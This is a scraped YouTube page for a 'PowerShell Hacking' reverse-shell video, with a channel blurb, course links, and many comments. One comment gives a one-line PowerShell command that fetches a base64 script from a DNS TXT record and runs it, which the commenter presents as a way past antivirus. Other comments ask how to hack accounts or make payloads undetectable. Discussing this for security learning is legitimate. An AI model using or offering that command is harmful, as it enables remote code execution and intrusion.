No video

PowerShell Hacking

  Рет қаралды 72,769

Loi Liang Yang

Loi Liang Yang

Күн бұрын

// Membership //
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: / @loiliangyang
// Courses //
Full Ethical Hacking Course: www.udemy.com/...
Full Web Ethical Hacking Course: www.udemy.com/...
Full Mobile Hacking Course: www.udemy.com/...
// Books //
Kali Linux Hacking: amzn.to/3IUXaJv
Linux Basics for Hackers: amzn.to/3EzRPV6
The Ultimate Kali Linux Book: amzn.to/3m7cutD
// Social Links //
Website: www.loiliangya...
Facebook: / loiliangyang
Instagram: / loiliangyang
LinkedIn: / loiliangyang
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.

Пікірлер: 174
@LLubdeRr
@LLubdeRr Жыл бұрын
Learned more about this topic in 8 min of this video than in two lessons with my teacher... thanks for that.
@exploit.6848
@exploit.6848 Жыл бұрын
Great power comes with great responsibility - Yes LOI sir
@skeeterwyh
@skeeterwyh Жыл бұрын
This will not work if the target PC didn’t download that file
@tchitchuJnr
@tchitchuJnr Жыл бұрын
i don't understand using 'hacking' word when you have direct access to a target and set it up how you need to get access to it
@onwongjan9621
@onwongjan9621 Жыл бұрын
Glad you said that becasue i wonder the same thing.. lol..
@waldemarfocht1564
@waldemarfocht1564 Жыл бұрын
I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here. 1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file. 2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this. 3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script. You have to be a little more imaginative. e.g. use base64 encoded script and work with -encodedcommand or use script blocks... It always works and I haven't seen an environment where it doesn't work: 1. Host a domain 2. Create TXT record with the base64 encoded script 3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]" In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell. So far I have not seen any EDR or AV solution that blocked this.
@SliderOverride
@SliderOverride Жыл бұрын
To funny he calls that hacking by downloading the script and run the Script it's not Hacker Loi, it's hacker "LOL"
@waldemarfocht1564
@waldemarfocht1564 Жыл бұрын
​@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them. In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.
@SliderOverride
@SliderOverride Жыл бұрын
@@waldemarfocht1564 like start Teamviewer and enter Id haha. It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction Then you can also download other executable files and run it with a script on your computer that's not hacking
@testtest-ez3mp
@testtest-ez3mp Жыл бұрын
thats smart, does this still work?
@waldemarfocht1564
@waldemarfocht1564 Жыл бұрын
@@testtest-ez3mp yeah it still works.
@scottbarker1337
@scottbarker1337 Жыл бұрын
Just found your channel and site, I cannot watch enough. Simply fantastic tutorials and rich explaination. 10/10
@tamboleo
@tamboleo Жыл бұрын
So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?
@Themusicbiz
@Themusicbiz Жыл бұрын
Only for the 1337 h4x0rs
@some_random_wot_dude485
@some_random_wot_dude485 Жыл бұрын
Just plug an USB in every computer you have access to.
@DestoFlix
@DestoFlix Жыл бұрын
Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.
@dancer_queen642
@dancer_queen642 Жыл бұрын
Have you ever heard name of social engineering techniques?😏
@williamgomez6226
@williamgomez6226 Жыл бұрын
It helps you get into hacking very effectively!!!
@YoloMoloPolo300
@YoloMoloPolo300 Жыл бұрын
Add to your PowerShell command to startup chrome as well. Target runs your shortcut, lets you in still see the chrome window that they were expecting.
@tekklov2646
@tekklov2646 Жыл бұрын
So interesting..i use only CMD for running Scripts against the target Machine thanks for that Video ! ❤️
@troopsleader4066
@troopsleader4066 Жыл бұрын
plzz make a video on scada system
@longlost8424
@longlost8424 Жыл бұрын
Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......
@tomasgorda
@tomasgorda Жыл бұрын
This look really nice, but could you do the same when you have av on, running defender and blocked using of IEX ? Like windows is normally working ?
@mysony1360
@mysony1360 Жыл бұрын
Can you please share your thoughts and knowledge about Windows Sandbox. If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox? Does is it protect for all kinds of threats? And, closing the sandbox, will this delete the infection, or it may stay in the system? Love your videos!!! Thanks a bunch!!
@respect444
@respect444 Жыл бұрын
Tq sir..... it's hackers world...... form Anonymous.
@PaulMG
@PaulMG Жыл бұрын
Wow. Very interesting stuff. Very educative
@felixkiprop48
@felixkiprop48 Жыл бұрын
Window Defender: "Am i a joke".
@rferabel
@rferabel Жыл бұрын
Hello, I wish to learn cybersecurity and hacking at the same time, how can I go about it please. I have no knowledge about them
@TheUrBarber
@TheUrBarber 23 күн бұрын
He said put on your black hat 😅😂
@sentient314
@sentient314 Жыл бұрын
Wow. This is some productive teaching shit
@GhostByteSoldier
@GhostByteSoldier 2 ай бұрын
thats all nice but what can we actaly do when we god the reverse shell
@Pentestersploit
@Pentestersploit Жыл бұрын
Thanks alot for the tutorial very helpful
@bulluinvestment3649
@bulluinvestment3649 Жыл бұрын
LOVE💖💖💖💖from INDIA(ODISHA)
@dreamkiller2693
@dreamkiller2693 Жыл бұрын
can you hack someone outside your network using this?
@calisrox4136
@calisrox4136 Жыл бұрын
daaamn, you best teacher hacker loi!!
@StoicGuideMap
@StoicGuideMap Ай бұрын
Only problem is that you need to get a user to download an application with malicious code, and also that code needs to not be detected by Windoes defender, which in this case, the powercat script is caught by Windows security and blocked from being downloaded.
@mara-uo1ob
@mara-uo1ob Жыл бұрын
Hi 👋 mr loh I need your advice i have 12 yrs Experience in sales marketing I want to do career conversion cyber security are you able to advise me.
@msmediascreenentertainment1951
@msmediascreenentertainment1951 Жыл бұрын
Great, please make one video for automation with Excel
@krotson6767
@krotson6767 Жыл бұрын
Will any antivirus protect against this attack?
@darknode4791
@darknode4791 Жыл бұрын
Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only
@sbeedfair9873
@sbeedfair9873 Жыл бұрын
thanks man you are great. you got a new subscriber :)
@harshpanchal5878
@harshpanchal5878 Жыл бұрын
You never disappoint us, Always love your work 🙌🏻❤️
@Jeff_Got_Keys_Pranks
@Jeff_Got_Keys_Pranks Жыл бұрын
Love your programme
@dr.wingkow3038
@dr.wingkow3038 Жыл бұрын
Good explanation.. By the way can you make tutorial "How To Exploit Pro Ftpd and Pure Ftpd with Metaslpoitable. Thanks before.
@shubhamvibhute5249
@shubhamvibhute5249 Жыл бұрын
good job male, thanks!
@mbauwuwofficial
@mbauwuwofficial Жыл бұрын
Hello sir, how remote access android with ip addres?
@jackofalltrades200
@jackofalltrades200 Жыл бұрын
Mind to make a video on how to evade this kind of Attack? Or even remove this shell file from your PC? Incase you noticed you got fused ?
@devas3761
@devas3761 Жыл бұрын
Hello sir our company email address is getting spoffed please help me to fix this
@hamzarashid7579
@hamzarashid7579 Жыл бұрын
I think the windwos defender is gonna pop up!!
@danygreen2967
@danygreen2967 Жыл бұрын
this is awesome i would like to be like you in the future .. :D
@Belkacemnotafraid
@Belkacemnotafraid Жыл бұрын
hello loiliang yang we want you to put vedio about the attiny 85 digispark
@t3chcs
@t3chcs Жыл бұрын
can it be possible that it doesnt work for me if i use a mobile hotspot as my internet?
@sushant7906
@sushant7906 Жыл бұрын
how I begin with hacking that I learn these type of things in details ?
@code.islife493
@code.islife493 Жыл бұрын
Script kiddie: tries to install powercat. Windows defender: Pipe down little fella.
@moujmast45
@moujmast45 Жыл бұрын
Best of the best
@bryanb3352
@bryanb3352 Жыл бұрын
Is any of this supposed to be surprising? Wow.. you're running powershell and downloading files. Crazy stuff.
@amservis8050
@amservis8050 Жыл бұрын
yes..yes..perfect
@jasveer2sgnr
@jasveer2sgnr Жыл бұрын
How to make spynote payload FUD?
@segdesc
@segdesc Жыл бұрын
How do you write on the screen?
@lazutozu2729
@lazutozu2729 Жыл бұрын
The great power comes the great responsibility
@F0SH
@F0SH Жыл бұрын
Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.
@SyedKamranAhmed
@SyedKamranAhmed Жыл бұрын
how to check our system is compromise or not.
@judithsalva4433
@judithsalva4433 Жыл бұрын
Are we using PowerShell from linux vm or Windows vm?
@shibuadak7419
@shibuadak7419 Жыл бұрын
sir please tell me how to create fund payload to bypass all av and crate it in .mp3 or .mp4 format. I need your help sir
@jackofalltrades200
@jackofalltrades200 Жыл бұрын
Ohhh! I think there's a malicious shell running on my PC because whenever I restart my PC I see a Quick she'll run a code and close.
@eddybash1342
@eddybash1342 Жыл бұрын
Run only linux !
@hereallweek
@hereallweek Жыл бұрын
You’re most likely fine that’s your computers bios booting up
@jackofalltrades200
@jackofalltrades200 Жыл бұрын
@@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit
@jackofalltrades200
@jackofalltrades200 Жыл бұрын
@@eddybash1342 what'd you mean? Run only Linux?
@lePoTo51
@lePoTo51 Жыл бұрын
Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility. What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand. And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...
@viralmoments8671
@viralmoments8671 Жыл бұрын
I would like to buy hacking course
@jeremyrichardson24
@jeremyrichardson24 Жыл бұрын
If you had something like this running on your system would it show up on the output of netstat ?
@architech5940
@architech5940 6 ай бұрын
Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.
@jokarjapan
@jokarjapan Жыл бұрын
What about windows defender real-time protection if enabled ?
@architech5940
@architech5940 6 ай бұрын
Doesn't work. You'll never get one of these powershell listeners to work on modern systems, not happening.
@geekgoof7045
@geekgoof7045 Жыл бұрын
Any video on how to stop someone from accessing your device?
@hxd9321
@hxd9321 Жыл бұрын
Mr hacker Loi please do an iPhone reverse shell tutorial
@airplanemode6353
@airplanemode6353 Жыл бұрын
Hey I wish you read my comment Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or KZbin I actually find nothing or find a solution but it doesn't work
@PetritK10
@PetritK10 Жыл бұрын
Can you make a video about AWS Hacking, like AWSGOAT project
@theshyguy3
@theshyguy3 11 ай бұрын
every time i try this on my main and dummy computer my dummy computer running windows says it cant connect to the remote server. plz help
@aecreation8317
@aecreation8317 Жыл бұрын
First to like and comment 🔥🔥
@maximadeti8009
@maximadeti8009 Жыл бұрын
Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.
@firozajilani9316
@firozajilani9316 8 ай бұрын
How can I send shortcut file to any one. ??
@mayhem1994
@mayhem1994 Жыл бұрын
love your videos aye
@bluesky8589
@bluesky8589 Жыл бұрын
Hello, Are you available to chat offline about a project?
@princesunil26k
@princesunil26k 3 ай бұрын
My system been hacked like this what can i do now, please help me
@AdittaChakraborty321
@AdittaChakraborty321 8 ай бұрын
Goid❤❤
@keremozcan4329
@keremozcan4329 3 ай бұрын
I just happened to notice 13 different powershell apps has opened on my computer and trying to find solution. Any helps? Am i under attack?
@viralmoments8671
@viralmoments8671 Жыл бұрын
Good video
@TheUrBarber
@TheUrBarber 23 күн бұрын
I turned around for literally 3 seconds and he had a server running.
@12335mohammad
@12335mohammad Жыл бұрын
ok do not forget to turn on real time and the firewall
@Themusicbiz
@Themusicbiz Жыл бұрын
Bro you don’t need to “slow down” but pauses after periods and commas would be nice. Sounds like one run on sentence
@WillSanchez1129
@WillSanchez1129 Жыл бұрын
Master loi I truly admire and respect the skill that you have and the work you put in to getting there. I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand
@user-in9pm4sg6x
@user-in9pm4sg6x Жыл бұрын
that's why I disabled ability to run powershell for users
@juanjo3002
@juanjo3002 Жыл бұрын
This works even with windows defender on?
@kolevv_6545
@kolevv_6545 Жыл бұрын
it should
@fz7833
@fz7833 Жыл бұрын
In 3,2,1 boom
@nexor4423
@nexor4423 Жыл бұрын
lol
@renatofreirefilho
@renatofreirefilho Жыл бұрын
Excelente Loi, como sempre muito bem explicado, continue com mais exemplos utilizando o powershell, são ótimos! Obrigado.
@dxddrb6557
@dxddrb6557 Жыл бұрын
That was confusing lol
@user-xv7di2ew6q
@user-xv7di2ew6q Жыл бұрын
Please 🙏 make a tutorial about mobile Android hacking I'am so sad
@hxd9321
@hxd9321 Жыл бұрын
He already had
@maxman126
@maxman126 Жыл бұрын
This is just jakobys payloads ....
@IamJakoby
@IamJakoby Жыл бұрын
Interesting huh 🤔
@viralmoments8671
@viralmoments8671 Жыл бұрын
When we are chatting on whatsapp are something like that...
@IND_SUBODH_GAMING
@IND_SUBODH_GAMING Жыл бұрын
Dear sir make a video from wifi password cracked
@KyleJCane
@KyleJCane Жыл бұрын
Hey hacker Lili why is sometimes metasploit is not working
@mynameis2110
@mynameis2110 Жыл бұрын
How
@marshalldteach1109
@marshalldteach1109 Жыл бұрын
I'm here because of Uber :D
@user-jo4lp5ll4v
@user-jo4lp5ll4v Жыл бұрын
Where are you, did you go to the moon? ❤️
@NoGreedSeeds
@NoGreedSeeds Жыл бұрын
Mmmmm. Power Hell. 😂
@frojas26
@frojas26 Жыл бұрын
Wooooo!
@markortilla6149
@markortilla6149 Жыл бұрын
Hi
@chrisantusobogi8951
@chrisantusobogi8951 Жыл бұрын
Help me to know how to mod premium paid apps from Google playstore please 🙏🙏
@howtodefeatgangstalking
@howtodefeatgangstalking Жыл бұрын
So we're just going to act like windows defender won't block this lol 😅
@sushant7906
@sushant7906 Жыл бұрын
OMG ! I just do it. That's unbelievable 😶‍🌫😶‍🌫
@arghya_2010
@arghya_2010 Жыл бұрын
😲😲😲😲 wow
@samsepiol5137
@samsepiol5137 Жыл бұрын
and windows defender is a cucumber
@viralmoments8671
@viralmoments8671 Жыл бұрын
But you speak very speedy
@CYBER-HERO
@CYBER-HERO Жыл бұрын
My nigga is here
@workout.trending
@workout.trending Жыл бұрын
bro can you hack a pc gamer and send it for me thank you 😃
@Naruto_Ep_tamil
@Naruto_Ep_tamil Жыл бұрын
Brother my gmail is hacked they changed every data please can you get it back please
@Naruto_Ep_tamil
@Naruto_Ep_tamil Жыл бұрын
What i do now explain please
@Naruto_Ep_tamil
@Naruto_Ep_tamil Жыл бұрын
Who can get it back my gmail plz
@ajeerkhader3079
@ajeerkhader3079 Жыл бұрын
hell yeah. gonna make so sNice tutorialtty electronic soft and live up to my destiny as a trans woman LET'S GOOOOO
Remotely Control Any Phone and PC with this Free tool!
17:15
Loi Liang Yang
Рет қаралды 888 М.
Windows PowerShell [01] Introduction
22:43
John Hammond
Рет қаралды 363 М.
1ОШБ Да Вінчі навчання
00:14
AIRSOFT BALAN
Рет қаралды 4,8 МЛН
Ethical Hacking Tutorial for Beginners
18:01
Loi Liang Yang
Рет қаралды 179 М.
Hacking Windows TrustedInstaller (GOD MODE)
31:07
John Hammond
Рет қаралды 593 М.
How Hackers Move Through Networks (with Ligolo)
20:01
John Hammond
Рет қаралды 268 М.
Password Hacking in Kali Linux
24:22
John Hammond
Рет қаралды 789 М.
How to tell if your PC is hacked?!
9:02
Loi Liang Yang
Рет қаралды 115 М.
CMD PRANKS! (Educational Purposes ONLY!)
9:17
Veraxity
Рет қаралды 1,5 МЛН
Detect Hackers & Malware on your Computer (literally for free)
16:38
Why Cybersecurity Training is a SCAM
10:37
Technical Institute of America
Рет қаралды 148 М.